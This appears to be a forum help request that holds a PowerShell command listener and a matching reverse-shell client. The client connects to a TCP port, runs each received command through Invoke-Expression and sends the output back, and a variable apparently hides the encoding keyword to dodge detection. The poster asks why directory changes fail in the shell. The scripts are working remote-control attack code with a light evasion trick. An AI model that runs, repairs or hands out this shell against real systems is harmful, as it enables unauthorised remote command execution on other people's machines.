Host = Windows 10
Target = Windows 10
#Listener:
$socket = new-object System.Net.Sockets.TcpListener('127.0.0.1', 9001);
if($socket -eq $null){
exit 1
}
$socket.start()
$client = $socket.AcceptTcpClient()
write-output "[*] Connection!"
$stream = $client.GetStream();
$writer = new-object System.IO.StreamWriter($stream);
$buffer = new-object System.Byte[] 2048;
$encoding = new-object System.Text.AsciiEncoding;
do
{
$cmd = read-host
$writer.WriteLine($cmd)
$writer.Flush();
if($cmd -eq "exit"){
break
}
$read = $null;
while($stream.DataAvailable -or $read -eq $null) {
$read = $stream.Read($buffer, 0, 2048)
$out = $encoding.GetString($buffer, 0, $read)
Write-Output $out
}
} While ($client.Connected -eq $true)
$socket.Stop()
$client.close();
$stream.Dispose()
#Shell:
$sm=(New-Object Net.Sockets.TCPClient('127.0.0.1',9001)).GetStream();
#COMMENT
[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;
$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);
$bypass = "ASCII"
$st=([text.encoding]::$bypass).GetBytes((iex $d 2>&1));
$sm.Write($st,0,$st.Length)}
The shell is not interactive, it can do “whoami” and “dir” but when I try to use “cd” it gives the error on the target side and just uses the last command. this is run on powershell ise
any thoughts or help?